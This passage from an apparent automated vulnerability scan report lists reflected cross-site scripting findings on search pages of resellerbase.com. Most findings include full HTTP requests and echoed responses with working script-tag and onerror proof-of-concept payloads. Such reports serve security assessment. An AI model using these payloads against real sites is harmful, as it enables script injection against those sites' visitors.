Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 31ac4<a>c5fd8d2b293 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search31ac4<a>c5fd8d2b293&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search31ac4<a>c5fd8d2b293&opt=2 was not found on this server.</p>
...[SNIP]...

2.303. http://www.resellerbase.com/adult/personals-dating/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9ac56<a>afa3b942c75 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...9ac56<a>afa3b942c75&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...9ac56<a>afa3b942c75&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.304. http://www.resellerbase.com/adult/personals-dating/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f2bc<script>alert(1)</script>435470a68ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2&9f2bc<script>alert(1)</script>435470a68ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2&9f2bc<script>alert(1)</script>435470a68ad=1 was not found on this server.</p>
...[SNIP]...

2.305. http://www.resellerbase.com/adult/personals-dating/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 55b49<a>e5b72bab3ea was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=255b49<a>e5b72bab3ea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=255b49<a>e5b72bab3ea was not found on this server.</p>
...[SNIP]...

2.306. http://www.resellerbase.com/adult/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8318d<script>alert(1)</script>07cf9d49e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8318d<script>alert(1)</script>07cf9d49e76/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8318d<script>alert(1)</script>07cf9d49e76/search.php was not found on this server.</p>
...[SNIP]...

2.307. http://www.resellerbase.com/adult/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98999"><script>alert(1)</script>4fd30a2e975a5948 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult98999"><script>alert(1)</script>4fd30a2e975a5948/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:41:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult98999"><script>alert(1)</script>4fd30a2e975a5948/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.308. http://www.resellerbase.com/adult/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218b0"><script>alert(1)</script>31214838003b46819 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php218b0"><script>alert(1)</script>31214838003b46819?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php218b0"><script>alert(1)</script>31214838003b46819?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.309. http://www.resellerbase.com/adult/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82a75<script>alert(1)</script>9ef8ad82204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php82a75<script>alert(1)</script>9ef8ad82204 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php82a75<script>alert(1)</script>9ef8ad82204 was not found on this server.</p>
...[SNIP]...

2.310. http://www.resellerbase.com/adult/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7dc"><a>d54a4a840d7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Searchbb7dc"><a>d54a4a840d7&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Searchbb7dc"><a>d54a4a840d7&opt=1/more2.html" style="color: ">
...[SNIP]...

2.311. http://www.resellerbase.com/adult/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b6beb<a>8c115101b49 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...&Submit3=Searchb6beb<a>8c115101b49&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...&Submit3=Searchb6beb<a>8c115101b49&opt=2 was not found on this server.</p>
...[SNIP]...

2.312. http://www.resellerbase.com/adult/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64916"><img%20src%3da%20onerror%3dalert(1)>a8498c66c54 was submitted in the cat parameter. This input was echoed as 64916\"><img src=a onerror=alert(1)>a8498c66c54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adult/search.php?cat=764916"><img%20src%3da%20onerror%3dalert(1)>a8498c66c54&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=764916\"><img src=a onerror=alert(1)>a8498c66c54">
...[SNIP]...

2.313. http://www.resellerbase.com/adult/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6b57"><img%20src%3da%20onerror%3dalert(1)>b0d61f4a1dbc55ff4 was submitted in the cat parameter. This input was echoed as e6b57\"><img src=a onerror=alert(1)>b0d61f4a1dbc55ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php?cat=7e6b57"><img%20src%3da%20onerror%3dalert(1)>b0d61f4a1dbc55ff4&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=7e6b57\"><img src=a onerror=alert(1)>b0d61f4a1dbc55ff4">
...[SNIP]...

2.314. http://www.resellerbase.com/adult/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415cc"><a>bbb6aa4c421 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...415cc"><a>bbb6aa4c421&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...415cc"><a>bbb6aa4c421&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.315. http://www.resellerbase.com/adult/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8b84b<a>9f3115828c9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...8b84b<a>9f3115828c9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...8b84b<a>9f3115828c9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.316. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59296"><a>a86b285e78f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/59296"><a>a86b285e78f252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/59296"><a>a86b285e78f252f/more2.html" style="color: ">
...[SNIP]...

2.317. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83cdf"><script>alert(1)</script>1e72c6ba119a50e6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&/83cdf"><script>alert(1)</script>1e72c6ba119a50e6fopt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&/83cdf"><script>alert(1)</script>1e72c6ba119a50e6fopt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.318. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a9445<script>alert(1)</script>a05532bc6cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php?a9445<script>alert(1)</script>a05532bc6cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
